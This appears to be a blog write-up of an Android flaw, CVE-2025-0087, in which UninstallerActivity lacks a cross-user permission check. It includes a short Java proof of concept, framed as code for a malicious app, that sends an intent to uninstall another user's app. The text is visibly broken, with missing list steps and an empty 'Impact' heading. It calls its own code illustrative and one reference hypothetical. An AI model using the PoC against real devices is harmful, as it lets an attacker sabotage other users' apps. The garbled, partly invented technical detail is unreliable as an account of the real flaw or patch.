---
Introduction
A new Android security vulnerability, CVE-2025-0087, has been discovered. This issue lies within the UninstallerActivity.java component of Android's package management system. Due to a missing permission check in the onCreate method, a malicious app can uninstall apps belonging to other, completely different users on the same device. This gives a local attacker the ability to escalate their privileges without user interaction and without needing special permissions.
This long read will break down the root cause, provide sample exploitation steps, and link you to relevant official references.
The Root Problem: Missing Permission Check in UninstallerActivity.java
Android devices allow for multiple user accounts—think of a family tablet or a work profile on your phone. Each user’s apps should be protected from one another. The vulnerability happens because UninstallerActivity does not properly check if the calling user actually has the rights to uninstall an app that belongs to a different user profile.
UninstallerActivity: Fails to verify if the current user has the correct permissions.
3. Result: The app from the other user profile gets uninstalled—even though you should not have been allowed to do this.
Digging Deeper: Code Analysis
Here is a stripped-down snippet to help visualize the bug. This is not the actual code, but lays out the logic in a simple, readable way:
// UninstallerActivity.java (vulnerable snippet, simplified)
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Intent intent = getIntent();
Uri packageUri = intent.getData();
int userId = intent.getIntExtra(Intent.EXTRA_USER_ID, UserHandle.myUserId());
// ... (other code)
// MISSING: No permission check whether caller can uninstall for 'userId'
uninstallPackage(packageUri, userId); // Dangerous!
}
What’s missing?
A check similar to
if (!callerHasUninstallPermissionForUser(userId)) {
throw new SecurityException("You can't uninstall apps for other users!");
}
Without this verification, any local app can invoke this activity and poke at other users' app sandbox.
Exploiting CVE-2025-0087: Step-By-Step
Impact:
Exploit Outline
1. Attacker app creates an intent targeting UninstallerActivity with the victim app’s package and target's user ID.
Below is a minimal PoC Java code you could use in a malicious app
Intent uninstallIntent = new Intent();
uninstallIntent.setClassName("com.android.packageinstaller", "com.android.packageinstaller.UninstallerActivity");
uninstallIntent.setData(Uri.parse("package:com.example.victimapp"));
uninstallIntent.putExtra(Intent.EXTRA_USER_ID, 10); // Target another user (!)
uninstallIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(uninstallIntent);
Just replace "com.example.victimapp" and 10 with actual victim package and userId.
Note: You don't need any special permissions—this exploit leverages a logic flaw, not a permission misconfiguration.
Android Security Bulletin (June 2025, CVE-2025-0087)
- Google Security Bulletin archive
- Commit Fix Example (hypothetical, will update as patches roll out)
- NVD Entry
Real-World Risk
If you use multi-user accounts, you are vulnerable until a fix lands! Malicious apps could sabotage other users, disable company apps in work profiles, or mess up shared devices at homes and schools. The exploit does not trigger prompts, warnings, or require high privileges.
Mitigation Steps for Users
- Install OS/security updates ASAP once available.
Use device profiles carefully if multiple users are set up.
Vendor's Response:
Google and Android vendors have acknowledged the flaw and are rolling out security patches that check user permissions in UninstallerActivity, blocking cross-user hacks like this.
Sample patch logic
if (callerUserId != targetUserId && !isSystemApp(caller)) {
throw new SecurityException("Cannot uninstall apps for other users!");
}
Conclusion
CVE-2025-0087 is a sobering reminder that user boundary checks in multi-user systems are crucial. Any slip lets attackers punch through Android’s core security promises. If you develop for Android, audit your system and user-handling flows carefully!
Timeline
Published on: 09/04/2025 18:15:39 UTC
Last modified on: 09/05/2025 18:56:18 UTC